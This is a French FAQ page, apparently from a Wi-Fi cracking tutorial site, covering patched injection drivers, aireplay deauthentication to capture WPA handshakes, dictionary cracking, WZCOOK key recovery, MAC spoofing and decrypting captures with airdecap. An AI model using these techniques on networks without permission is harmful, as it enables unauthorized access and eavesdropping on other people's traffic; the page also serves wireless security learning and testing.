Note 3: Si vous utilisez wpa_supplicant, vous devrez le recompiler (les vieilles versions ne sont pas compatibles avec l'actuel madwifi CVS), et assurez vous que CONFIG_DRIVER_MADWIFI=y soit décommenté dans config.h.

Note 4: Avec le madwifi actuel, ce n'est plus la peine de lancer "iwpriv ath0 mode 2", depuis que les drivers autorisent l'injection en mode 0 utilisant la nouvelle interface athXraw.

Modes autorisés Environnement

Mode 0 Automatique (a/b/g)

Mode 1 802.11a uniquement

Mode 2 802.11b uniquement

Mode 3 802.11g uniquement

ifconfig ath0 downrmmod wlan_wep ath_rate_sample ath_rate_onoe \ ath_pci wlan ath_hal 2>/dev/null

find /lib/modules -name 'ath*' -exec rm -v {} \; 2>/dev/nullfind /lib/modules -name 'wlan*' -exec rm -v {} \; 2>/dev/nullcd /usr/srcwget http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/atheros/madwifi-cvs-20051025.tgzwget http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/patches/madwifi-cvs-20051025.patchtar -xvzf madwifi-cvs-20051025.tgzcd madwifi-cvs-20051025patch -Np1 -i ../madwifi-cvs-20051025.patchmake KERNELPATH=/usr/src/linux-<insert version>make installmodprobe ath_pci

Il est maintenant possible de choisir la puissance d'emission avec madwifi (rt2570 également). La puissance recommandé est 5.5 Mbps, mais vous pouvez l'augmenter ou la diminuer, suivant la distance vous séparant de l'AP. Par exemple:

iwconfig ath0 rate 24M

Modulation Taux autorisées

DSSS / CCK 1M, 2M, 5.5M, 11M

OFDM (a/g) 6M, 9M, 12M, 24M, 36M, 48M, 54M

Lors de l'utilisation des attaques 2, 3 et 4, en changeant le nombre de paquets par seconde envoyés par aireplay (option -x) cela peut parfois aider à obtenir de meilleurs resultats; le réglage par defaut est de 500 pps.






● Accueil

● Tuto

● A venir

● Vidéos

● Forum

● Chat irc

● A propos




Installation des pilotes / drivers prism54 (Cartes PrismGT FullMAC)

ifconfig eth1 downrmmod prism54

cd /usr/srcwget http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/prismgt/prism54-svn-20050724.tgzwget http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/patches/prism54-svn-20050724.patchtar -xvzf prism54-svn-20050724.tgzcd prism54-svn-20050724patch -Np1 -i ../prism54-svn-20050724.patchmake modules && make installwget http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/prismgt/1.0.4.3.armmkdir -p /usr/lib/hotplug/firmwaremkdir -p /lib/firmwarecp 1.0.4.3.arm /usr/lib/hotplug/firmware/isl3890mv 1.0.4.3.arm /lib/firmware/isl3890depmod -a






● Accueil

● Tuto

● A venir

● Vidéos

● Forum

● Chat irc

● A propos




Installation des pilotes / drivers HostAP (Cartes Prism2)

ifconfig wlan0 downwlanctl-ng wlan0 lnxreq_ifstate ifstate=disable/etc/init.d/CardBus stoprmmod prism2_pcirmmod hostap_pci

cd /usr/srcwget http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/prism2/hostap-driver-0.4.5.tar.gzwget http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/patches/hostap-driver-0.3.9.patchtar -xvzf hostap-driver-0.4.5.tar.gzcd hostap-driver-0.4.5patch -Np1 -i ../hostap-driver-0.3.9.patchmake && make installmv -f /etc/pcmcia/wlan-ng.conf /etc/pcmcia/wlan-ng.conf~/etc/init.d/pcmcia startmodprobe hostap_pci &>/dev/null






● Accueil

● Tuto

● A venir

● Vidéos

● Forum

● Chat irc

● A propos




Installation des pilotes / drivers wlan-ng (Cartes Prism2)

Note importante: lorsque la carte est insérée, wlan-ng va flasher le firmware dans la RAM (volatile) avec les version PRI 1.1.4 et STA 1.8.3. Beaucoup de problèmes semblent apparaitrent avec cette opération, c'est pourquoi il est plus sûr d'employer juste le hostap. En outre, HostAP fonctionne plus sûrement et soutient l'iwconfig tandis que wlan-NG non

ifconfig wlan0 downwlanctl-ng wlan0 lnxreq_ifstate ifstate=disable/etc/init.d/pcmcia stoprmmod prism2_pcirmmod hostap_pcifind /lib/modules \( -name p80211* -o -name prism2* \) \ -exec rm -v {} \;

cd /usr/srcwget http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/prism2/wlanng-0.2.1-pre26.tar.gzwget http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/patches/wlanng-0.2.1-pre26.patchtar -xvzf wlanng-0.2.1-pre26.tar.gzcd wlanng-0.2.1-pre26patch -Np1 -i ../wlanng-0.2.1-pre26.patchmake config && make all && make installmv /etc/pcmcia/hostap_cs.conf /etc/pcmcia/hostap_cs.conf~/etc/init.d/pcmcia startmodprobe prism2_pci &>/dev/null






● Accueil

● Tuto

● A venir

● Vidéos

● Forum

● Chat irc

● A propos




Installation des pilotes / drivers r8180-sa2400 (Cartes RTL8180)

ifconfig wlan0 downrmmod r8180

cd /usr/srcwget http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/rtl8180/rtl8180-0.21.tar.gzwget http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/patches/rtl8180-0.21.patchtar -xvzf rtl8180-0.21.tar.gzcd rtl8180-0.21patch -Np1 -i ../rtl8180-0.21.patchmake && make installdepmod -amodprobe r8180






● Accueil

● Tuto

● A venir

● Vidéos

● Forum

● Chat irc

● A propos




Installation des pilotes / drivers rt2500 (Ralink b/g PCI/CardBus)

ifconfig ra0 downrmmod rt2500

cd /usr/srcwget http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/ralink/rt2500-cvs-20051112.tgztar -xvzf rt2500-cvs-20051112.tgzcd rt2500-cvs-20051112cd Modulemake && make installmodprobe rt2500

Assurez vous de charger les drivers avec modprobe (pas insmod) et de mettre la carte en mode Monitor avant de démarrer l'interface.






● Accueil

● Tuto

● A venir

● Vidéos

● Forum

● Chat irc

● A propos




Installation des pilotes / drivers rt2570 (Ralink b/g USB)

ifconfig rausb0 downrmmod rt2570

cd /usr/srcwget http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/ralink/rt2570-cvs-20051112.tgztar -xvzf rt2570-cvs-20051112.tgzcd rt2570-cvs-20051112cd Modulemake && make installmodprobe rt2570






● Accueil

● Tuto

● A venir

● Vidéos

● Forum

● Chat irc

● A propos




Le driver ne se compile pas.

Ceci se produit en principe car vos entêtes linux ne corresponde pas au noyau utilisé. Dans ce cas recompilez simplement un nouveau noyau, installez le et redémarrez. Ensuite retentez la compilation du pilote.

Regardez ce HOWTO pour plus de details au sujet de la compilation du noyau.






● Accueil

● Tuto

● A venir

● Vidéos

● Forum

● Chat irc

● A propos




Je possede une carte Prism2, mais airodump / aireplay ne semblent pas fonctionner !

Premièrement, assurez vous que vous n'utilisez pas de pilotes orinoco. Si le nom de l'interface est wlan0, alors le pilote est HostAP ou wlan-ng. Cependant si le nom de l'interface est eth0 ou eth, alors il s'agit du pilote orinoco et vous devez le désactiver (Utilisez la commande cardctl pour identifier le constructeur de votre materiel, ensuite éditez /etc/pcmcia/config, remplacez orinoco_cs par hostap_cs et redémarrez cardmgr).

Cependant, il peut également s'agir d'un problème de firmware. Les anciens firmwares ont quelques soucis avec le mode test 0x0A (utilisé par les patchs d'injection HostAP / wlan-ng), assurez vous donc que les votres sont à jour -- Regardez ci dessous pour les instructions. La version recommandée du pilote de la station est la version 1.7.4. Si jamais cela ne fonctionnait pas très bien (kismet ou airodump fige/stop après la capture de quelques paquets), essayez à la place STA 1.5.6 (Soit s1010506.hex pour les anciennes cartes Prism2, soit sf010506.hex pour les plus récentes).

Parralellement le mode de test 0x0A est quelque chose d'assez instable avec les pilotes wlan-ng. Si la carte semble se bloquer, vous devez la redémarrer ou utiliser HostAP à la place. L'injection est actuellement impossible sur les materiels usb avec un chipset prism2 ou wlan-ng.

Note: Vous pouvez trouver un driver Windows XP pour les cartes Prism2 supportant le WPA/TKIP ici: wpc11v3.0_wpa_dr.exe.






● Accueil

● Tuto

● A venir

● Vidéos

● Forum

● Chat irc

● A propos




Je possede une carte Atheros, et le patch madwifi fait planter le kernel / aireplay continue de me dire que le support amélioré du RTC n'est pas disponible

Il y a pas mal de problèmes avec quelques versions de la branche linux 2.6 (particulierement avant que la 2.6.11 ne soit distribuée) qui provoquent un plantage du noyau lors de l'injection avec madwifi. Ainsi sur certain noyau 2.6 le support amélioré RTC est simplement coupé. Il est donc fort recommandé d'utiliser linux 2.6.11.x ou plus récent.






● Accueil

● Tuto

● A venir

● Vidéos

● Forum

● Chat irc

● A propos




Comment puis-je craquer un reseau WPA-PSK ?

Vous devez "écouter" juqsqu'a ce qu'une interconnexion (handshake) entre un client et l'AP se produise. Pour forcer le client à se reautentifier, vous pouvez démarrer une attaque par desautentification avec airplay. En outre, un bon dictionnaire est exigé ; voyez http://ftp.se.kde.org/pub/security/tools/net/Openwall/wordlists/

FYI, il n'est pas possible de calculer a l'avance de grandes tables de "Pairwise Master Keys" comme le fait rainbowcrack, depuis que la passphrase calculée avec le ESSID.






● Accueil

● Tuto

● A venir

● Vidéos

● Forum

● Chat irc

● A propos




WZCOOK retrouve-t-il les clefs WPA ?

WZCOOK va afficher le PMK (Pairwise Master Key), une valeur de 256-bit qui est le resultat de la passphrase haché 8192 fois ainsi que l'ESSID et la longueur du ESSID. La passphrase elle même ne peut etre retrouvée-- cependant, le fait de connaitre le PMK est suffisant pour se connecter à un reseau sans fil avec wpa_supplicant (voir le Windows README). Votre configuration wpa_supplicant.conf devrait ressembler a ceci:

network={ ssid="mon_essid" pmk=5c9597f3c8245907ea71a89d[...]9d39d08e }






● Accueil

● Tuto

● A venir

● Vidéos

● Forum

● Chat irc

● A propos




Le WPA va-t-il etre cracker dans le futur ?

Il y a tres peu de chance que le WPA soit cassé comme l'a été le WEP

Le plus gros probleme avec le WEP est que la cle partagées est inclus dans les IVs; le resultat est directement employé pour alimenter RC4. Cette construction excessivement simple est enclin à une attaque statistique, puisque les premiers bytes de texte chiffré sont fortement corrélés avec la clef partagée (voir Andrew Roos' paper). l y a fondamentalement deux contre-mesures contre cette attaque : 1. mélangez l'IV et la clef partagée en utilisant une fonction de hash ou 2. jettez les 256 premiers bytes de RC4's.

Il y a eu pas mal de désinformation dans les nouvelles au sujet des "failles" de TKIP :

Pour le moment, TKIP est raisonnablement sécurisé mais il se fonde toujours sur le même algorithme RC4 sur lequel WEP s'est fondé.

En fait, TKIP (WPA1) n'est pas vulnérable : pour chaque paquet, le 48-bit IV est mélangé à la clef 128-bit par paires temporelle pour créer une clef de 104-bit RC4, ainsi il n'y a aucune corelation statistique. En outre, WPA fournit des contre-mesures contre des attaques actives (reinjection du trafic), inclut un code plus fort d'intégrité de message (Michael), et a un protocole très robuste d'authentification (le handshake 4-way). La seule vulnérabilité est jusqu'ici une attaque par dictionnaire, qui échoue si le passphrase est assez robuste.

WPA2 (aka 802.11i) est exactement le même que WPA1, sauf que CCMP (AES en contre- mode) est employé au lieu de RC4 et que HMAC-SHA1 est employé au lieu de HMAC-MD5 pour l'EAPOL MIC. WPA2 est un peu meilleur que WPA1, mais ni l'un ni l'autre ne vont être cracker dans un proche avenir.






● Accueil

● Tuto

● A venir

● Vidéos

● Forum

● Chat irc

● A propos




Comment savoir si ma clef WEP est correct ?

Il y a 2 mode d'authentification pour le WEP

● Authentifivcation Open-System : il s'agit du mode par defaut. Tout les clients sont accéptés par l'AP et la clef n'est jamais controlée: on accorde toujours l'association. Cependant si votre clef est incorrecte vous ne pourrez pas recevoir ou envoyer des paquets (parce que le déchiffrage échouera), ainsi DHCP, ping ... seront time-out

● Authentification par partage de clef "Shared-Key": Le client doit chiffrer quelquechose avant que l'AP ne lui accorde l'association. Ce mode est défectueux et mène au rétablissement du keystream, ainsi il n'est jamais activé par défaut.

En résumé, le fait que vous semblez vous être relié avec succès au point d'accès ne signifie pas que votre clef de WEP est correcte ! Pour vérifier votre clef WEP, essayez de déchiffrer un fichier de capture avec airdecap ou avec ethereal.






● Accueil

● Tuto

● A venir

● Vidéos

● Forum

● Chat irc

● A propos




Pas moyen de cracker cet AP !

Il y a eu une coquille .

Passez faire un tour sur le forum on tentera de vous dépanner Indiquez bien les plus de renseignements possible: Type d'ap, carte wifi, pilote, chipset, sys d'exploitation ...






● Accueil

● Tuto

● A venir

● Vidéos

● Forum

● Chat irc

● A propos




Comment retrouver mes clef wep sous Windows ?

Vous pouvez utiliser le programme WZCOOK qui permet de retrouver les clef WEP à partir de l'utilitaire de configuration sans fil de XP. Ceci est un programme experimental et il risque de ne pas fonctionner suivant votre service pack.






● Accueil

● Tuto

● A venir

● Vidéos

● Forum

● Chat irc

● A propos




Comment puis-je changer l'adresse mac de ma carte wifi?

Sous Linux: par exemple , si vous avez unes carte Atheros:

ifconfig ath0 downifconfig ath0 hw ether 00:11:22:33:44:55ifconfig ath0 up

Sous Windows, vous pouvez utiliser macmakeup ou etherchange.

Voir le tutorial pour des exemples






● Accueil

● Tuto

● A venir

● Vidéos

● Forum

● Chat irc

● A propos




Puis-je utiliser Ethereal pour capturer des paquets 802.11?

Sous Linux, configurez simplement votre carte en mode monitor avec le script airmon.sh. Sous windows, Ethereal ne peut pas capturer de paquets 802.11.






● Accueil

● Tuto

● A venir

● Vidéos

● Forum

● Chat irc

● A propos




Ethereal peut-il decoder les paquets de données WEP ?

OUi. Allez dans Edit -> Preferences -> Protocols -> IEEE 802.11, selectionnez 1 comme valeure de "WEP key count" et rentrez votre clef wep.

Voir l'exemple ici






● Accueil

● Tuto

● A venir

● Vidéos

● Forum

● Chat irc

● A propos




J'ai trouver la clef, comment decrypter le fichier de capture ?

Vous pouvez utiliser le programme airdecap :

utilisation: airdecap [options] <pcap file>

-l : ne pas enlever le header 802.11 -b bssid : filtre MAC d'AP -k pmk : WPA Pairwise Master Key en hex -e essid : Identifiant ascci du reseau cible -p pass : passphrase WPA du reseau cible -w key : passphrase WEP du reseau cible en hex exemples:

airdecap -b 00:09:5B:10:BC:5A open-network.cap airdecap -w 11A3E229084349BC25D97E2939 wep.cap airdecap -e 'le ssid' -p passphrase tkip.cap






Documents

24200329 Decryptage Clef Wep Suite